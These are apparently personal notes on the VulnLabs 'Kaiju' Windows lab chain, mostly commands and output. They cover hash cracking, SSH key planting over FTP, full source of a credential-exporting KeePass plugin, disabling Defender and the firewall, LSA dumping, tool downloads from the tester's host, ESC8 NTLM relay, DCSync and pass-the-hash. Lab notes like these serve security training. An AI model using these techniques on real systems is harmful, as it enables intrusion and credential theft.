Kaiju (Chain)
This is not a writeup, just my notes about VulnLabs machines.
Last updated
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Microsoft Windows Server 2022 Standard
Chain: True (3 Machines)
Administrator
NakedMelonMan25
KeePass Malicious DLL
Local Administrator on BERSRV200
clare.frost
atnTYzyew3Ok+d
Dumped via LSA
Domain User
✅ Valid Usernames
Administrator
clare.frost 🔑 Passwords list
NakedMelonMan25
atnTYzyew3Ok+dHost is up (0.019s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Host is up (0.019s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
3389/tcp open ms-wbt-server
Host is up (0.018s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-serverFTP anonymous authentication enabled
Keepass database found it.kdbx
During the enumeration the tester found users.xml within FTP service that containing a hash FileZilla's password encrypted using PBKDF2-HMAC-SHA256 and mount point E:\Public indicate the presence of a additional disk.
<password index="1">
<hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
<salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
<iterations>100000</iterations>
</password>sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU❯ hashcat -m 10900 hash.txt possible-passwords.txt -r /usr/share/hashcat/rules/best64.rule
<SNIF>
Dictionary cache built:
* Filename..: possible-passwords.txt
* Passwords.: 12
* Bytes.....: 91
* Keyspace..: 924
* Runtime...: 0 secs
sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU:backup123Password Found: backup123
❯ ssh backup@10.10.170.134
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
backup@BERSRV200 C:\Users\backup>backup@BERSRV200 C:\Users\backup>dir E:\
Volume in drive E is Data
Volume Serial Number is A494-31FF
Directory of E:\
12/27/2023 03:15 AM <DIR> Private
12/27/2023 03:15 AM <DIR> Program Files
12/27/2023 03:15 AM <DIR> Public
0 File(s) 0 bytes
3 Dir(s) 1,960,206,336 bytes free
backup@BERSRV200 E:\Program Files\FileZilla Server>type install.log
<SNIF>
Crypt output: [--admin.password@index=1 --admin.password.hash=mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8 --admin.password.salt=AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18 --admin.password.iterations=100000]
<SNIF>❯ hashcat -m 10900 admin.hash possible-passwords.txt -r /usr/share/hashcat/rules/best64.rule
<SNIF>
Dictionary cache hit:
* Filename..: possible-passwords.txt
* Passwords.: 12
* Bytes.....: 91
* Keyspace..: 924
sha256:100000:AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18:mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8:kaiju123Password: kaiju123
❯ ssh backup@10.10.130.54 -L 0.0.0.0:14148:localhost:14148PS E:\Program Files\FileZilla Server> (Get-Item "E:\Program Files\FileZilla Server\filezilla-server.exe").Versioninfo
ProductVersion FileVersion FileName
-------------- ----------- --------
1, 8, 0, 0 1, 8, 0, 0 E:\Program Files\FileZilla Server\filezilla-server.exeDue to a bug in FileZilla Server 1.8.0 that prevented users from modifying configurations directly, the tester exported the configuration file, changed the backup's new_native_path attribute to C:\, and reimported it.
<user name="backup" enabled="true">
<mount_point tvfs_path="/" access="1" native_path="" new_native_path="C:\" recursive="2" flags="0" />
<rate_limits inbound="unlimited" outbound="unlimited" session_inbound="unlimited" session_outbound="unlimited" />
<allowed_ips></allowed_ips>
<disallowed_ips></disallowed_ips>
<session_open_limits files="unlimited" directories="unlimited" />
<session_count_limit>unlimited</session_count_limit>
<description></description>
<password index="1">
<hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
<salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
<iterations>100000</iterations>
</password>❯ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/Intrusionz3r0/.ssh/id_ed25519): sasrv200
Enter passphrase for "sasrv200" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sasrv200
Your public key has been saved in sasrv200.pub
The key fingerprint is:
SHA256:7Hm6WnE/3jTe4JgmwQ0WWRrBwu4OQasqu96LLDP8Gtw Intrusionz3r0@kali
The key's randomart image is:
+--[ED25519 256]--+
| . .o+. |
| . o +o |
| . o ... |
| o.. o |
| . oSo.o |
|. . . ...+o.. |
|.o E o+ ..o + |
|*.= ..o...O + |
|=@o+. ..o. o+ + .|
+----[SHA256]-----+
❯ cp sasrv200.pub authorized_keys ftp> put authorized_keys ❯ ssh -i sasrv200 sasrv200@10.10.211.38PS C:\Users\sasrv200\Desktop> while ($true) { Get-Process | ? { $_.ProcessName -like '*keepass*' }; Start-Sleep -Seconds 5 }Code:
using System;
using System.IO;
using System.Windows.Forms;
using KeePass.DataExchange;
using KeePass.Forms;
using KeePass.Plugins;
using KeePassLib.Utility;
using KeePass;
using KeePassLib.Serialization;
using KeePass.App;
using KeePassLib.Keys;
using KeePassLib;
namespace KeeFarceRebornPlugin
{
public sealed class KeeFarceRebornPluginExt : Plugin
{
private IPluginHost m_host = null;
public override bool Initialize(IPluginHost host)
{
if (host == null) return false;
m_host = host;
m_host.MainWindow.FileOpened += this.OnFileOpened;
return true;
}
private void OnFileOpened(object sender, FileOpenedEventArgs e)
{
var database = m_host.Database;
var rootGroup = database.RootGroup;
PwExportInfo pwExportInfo = new PwExportInfo(rootGroup, database);
FileFormatProvider fileFormat = Program.FileFormatPool.Find("KeePass XML (2.x)");
string exportFilePath = "C:\\temp\\export.xml";
IOConnectionInfo iocOutput = IOConnectionInfo.FromPath(exportFilePath);
if (pwExportInfo == null) return;
if (pwExportInfo.DataGroup == null) return;
if (fileFormat == null) return;
bool bFileReq = fileFormat.RequiresFile;
if (bFileReq && (iocOutput == null)) return;
if (bFileReq && (iocOutput.Path.Length == 0)) return;
PwDatabase pd = pwExportInfo.ContextDatabase;
if (pd == null) return;
if (!AppPolicy.Try(AppPolicyId.Export)) return;
if (!fileFormat.SupportsExport) return;
if (!fileFormat.TryBeginExport()) return;
CompositeKey ckOrgMasterKey = null;
DateTime dtOrgMasterKey = PwDefs.DtDefaultNow;
PwGroup pgOrgData = pwExportInfo.DataGroup;
PwGroup pgOrgRoot = ((pd != null) ? pd.RootGroup : null);
bool bExistedAlready = true;
bool bResult = false;
try
{
if (bFileReq) bExistedAlready = IOConnection.FileExists(iocOutput);
Stream s = (bFileReq ? IOConnection.OpenWrite(iocOutput) : null);
try
{
bResult = fileFormat.Export(pwExportInfo, s, null);
}
finally { if (s != null) s.Close(); }
}
catch (Exception ex) { MessageService.ShowWarning(ex); }
finally
{
if (ckOrgMasterKey != null)
{
pd.MasterKey = ckOrgMasterKey;
pd.MasterKeyChanged = dtOrgMasterKey;
}
}
if (bFileReq && !bResult && !bExistedAlready)
{
try { IOConnection.DeleteFile(iocOutput); }
catch (Exception) { }
}
return;
}
}
}File: KeePass.config.xml
<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Meta>
<PreferUserConfiguration>true</PreferUserConfiguration>
</Meta>
<Policy>
<Plugins>true</Plugins>
<Export>true</Export>
</Policy>
</Configuration>
To abuse of the malicious plugin
Upload KeeFarceRebornPlugin.dll inside E:\Public\Software\KeePass2\Plugins
Replace KeePass.config.xml with the new configurations.
Waiting a minutes for export.xml is exported into C:\Temp .
PS C:\Temp> type export.xml
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<KeePassFile>
<SNIF>
<String>
<Key>Password</Key>
<Value ProtectInMemory="True">NakedMelonMan25</Value>
</String>
<SNIF>
</KeePassFile>PS E:\Public\Software\KeePass2\Plugins> Set-MPPreference -DisableRealTimeMonitoring $true
PS E:\Public\Software\KeePass2\Plugins> (Get-MPComputerStatus).RealTimeProtectionEnabled
False
PS E:\Public\Software\KeePass2\Plugins> Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False❯ proxychains nxc smb 10.10.223.214 -u Administrator -p 'NakedMelonMan25' --local-auth --lsa 2>/dev/null
SMB 10.10.223.214 445 BERSRV200 [*] Windows Server 2022 Build 20348 x64 (name:BERSRV200) (domain:BERSRV200) (signing:False) (SMBv1:False)
SMB 10.10.223.214 445 BERSRV200 [+] BERSRV200\Administrator:NakedMelonMan25 (Pwn3d!)
SMB 10.10.223.214 445 BERSRV200 [+] Dumping LSA secrets
SMB 10.10.223.214 445 BERSRV200 KAIJU.VL/sasrv200:$DCC2$10240#sasrv200#44a1583ed4678aa2fba0bd7d13eea30f: (2024-01-30 20:13:30)
SMB 10.10.223.214 445 BERSRV200 KAIJU.VL/Clare.Frost:$DCC2$10240#Clare.Frost#180216e4d0aa40dbf4767dd7ba50f187: (2024-01-21 15:01:24)
SMB 10.10.223.214 445 BERSRV200 KAIJU.VL/Administrator:$DCC2$10240#Administrator#873c4a9511ccfd89537a22fc1cc3ff35: (2024-01-21 15:17:37)
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:aes256-cts-hmac-sha1-96:6133fe5a03272b2913687fc953a7bbbef6f3c13a814f7433592c3ad22296b3ad
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:aes128-cts-hmac-sha1-96:4f20bf429199d4eebccbc116a80532e4
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:des-cbc-md5:dfa48f024a6bbc4c
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:plain_password_hex:6602fb36225eef29799d53ec405d84cb172a6ace527631c7493faba05f7785b8b5c44219caf9dec7143f9662021b24bbd0b629e19d8ec87142eedaa41bb1a4f6841afae9e885b43f37e7a19a1671f67d13c4c4e2fddb68d7fbe15fc5c3c307f1027374ebfc8fd9d542ad566e1bd35735ae24b12f9e1a0f5336aad4cbe5131362b41ce3ecd1c31c4603c0923a07b3b4744aa66556ab19d67a7605459576c886f5b2500a42c1002141371982c1e787d936b0f424115b2dac33bd58d89b27d0d0076e9f43228c2594ce2fe1db60afe827bf0bb7897e74d279faa6c8353b4f020b63e9188343056503342d2e732ab5397422
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:aad3b435b51404eeaad3b435b51404ee:5f3e096d29d5272e756639491122bcd1:::
SMB 10.10.223.214 445 BERSRV200 kaiju.vl\clare.frost:atnTYzyew3Ok+d❯ proxychains certipy-ad find -u clare.frost -p 'atnTYzyew3Ok+d' -dc-ip 10.10.223.213 -vulnerable -stdout 2>/dev/null
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 2 certificate authorities
[*] Found 22 enabled certificate templates
[*] Trying to get CA configuration for 'kaiju-sub-CA' via CSRA
[!] Got error while trying to get CA configuration for 'kaiju-sub-CA' via CSRA: rpc_s_access_denied
[*] Trying to get CA configuration for 'kaiju-sub-CA' via RRP
[*] Got CA configuration for 'kaiju-sub-CA'
[*] Trying to get CA configuration for 'kaiju-CA' via CSRA
[!] Got error while trying to get CA configuration for 'kaiju-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'kaiju-CA' via RRP
[*] Got CA configuration for 'kaiju-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : kaiju-sub-CA
DNS Name : BERSRV105.kaiju.vl
Certificate Subject : CN=kaiju-sub-CA, DC=kaiju, DC=vl
Certificate Serial Number : 71000000048715771814C1ABBA000000000004
Certificate Validity Start : 2024-01-21 14:57:07+00:00
Certificate Validity End : 2026-01-21 15:07:07+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : KAIJU.VL\Administrators
Access Rights
ManageCertificates : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
ManageCa : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
Enroll : KAIJU.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
1
CA Name : kaiju-CA
DNS Name : BERSRV100.kaiju.vl
Certificate Subject : CN=kaiju-CA, DC=kaiju, DC=vl
Certificate Serial Number : 6D6D8A048E2B8C9B4385A113BEEA1F00
Certificate Validity Start : 2023-12-17 14:14:04+00:00
Certificate Validity End : 2523-12-17 14:24:04+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : KAIJU.VL\Administrators
Access Rights
ManageCertificates : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
ManageCa : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
Enroll : KAIJU.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templatesThe tester faced a problem trying to exploit ESC8 due outbound SMB traffic is blocked by a firewall.
Upload the binary and its dependencies.
PS C:\Temp> IWR -URI http://10.8.5.48/config.txt -outfile config.txt
PS C:\Temp> IWR -URI http://10.8.5.48/StreamDivert.exe -outfile StreamDivert.exe
PS C:\Temp> IWR -URI http://10.8.5.48/StreamDivert.pdb -outfile StreamDivert.pdb
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert.dll -outfile WinDivert.dll
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert64.sys -outfile WinDivert64.sys
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert32.sys -outfile WinDivert32.sys
❯ administrator@BERSRV200 C:\Users\Administrator\Downloads>type config.txt
tcp < 445 0.0.0.0 -> 127.0.0.1 4455
❯ administrator@BERSRV200 C:\Users\Administrator\Downloads>StreamDivert.exe config.txt -f -v ❯ ssh administrator@10.10.231.22 -R 4455:127.0.0.1:445❯ proxychains impacket-ntlmrelayx -t http://BERSRV105.kaiju.vl/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController' --no-http 2>/dev/null❯ proxychains -q python3 dfscoerce.py -u clare.frost -p 'atnTYzyew3Ok+d' -d 'kaiju.vl' BERSRV200 kaiju.vlOutput of ntlmrelayx:
[*] SMBD-Thread-4 (process_request_thread): Received connection from 127.0.0.1, attacking target http://BERSRV105.kaiju.vl
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://BERSRV105.kaiju.vl as KAIJU/BERSRV100$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 7
[*] Writing PKCS#12 certificate to ./BERSRV100$.pfx
[*] Certificate successfully written to file
[*] SMBD-Thread-6 (process_request_thread): Received connection from 127.0.0.1, attacking target http://BERSRV105.kaiju.vl
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://BERSRV105.kaiju.vl as KAIJU/BERSRV100$ SUCCEED
[*] Skipping user BERSRV100$ since attack was already performed❯ proxychains certipy-ad auth -pfx dc.pfx 2>/dev/null
[*] Using principal: bersrv100$@kaiju.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'bersrv100.ccache'
[*] Trying to retrieve NT hash for 'bersrv100$'
[*] Got hash for 'bersrv100$@kaiju.vl': aad3b435b51404eeaad3b435b51404ee:82bea846cd5a029773b9ea9d2fe33c1c❯ export KRB5CCNAME='bersrv100.ccache'
❯ proxychains impacket-secretsdump -k -no-pass BERSRV100.kaiju.vl -just-dc 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b46720476be1abfbb3282cb80054f40:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e97467587cb5f64e221bdb985b6c2cb0:::
kaiju.vl\sasrv200:1104:aad3b435b51404eeaad3b435b51404ee:0049f304fb42d8b5b7336384d94ef5fa:::
<SNIF>❯ proxychains evil-winrm -i BERSRV100 -u 'Administrator' -H 0b46720476be1abfbb3282cb80054f40 2>/dev/null
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
kaiju\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> The tester used the format specified in the next thread: to create the hash format and using 10900 that corresponding to PBKDF2-HMAC-SHA256.
Download:
Repository:
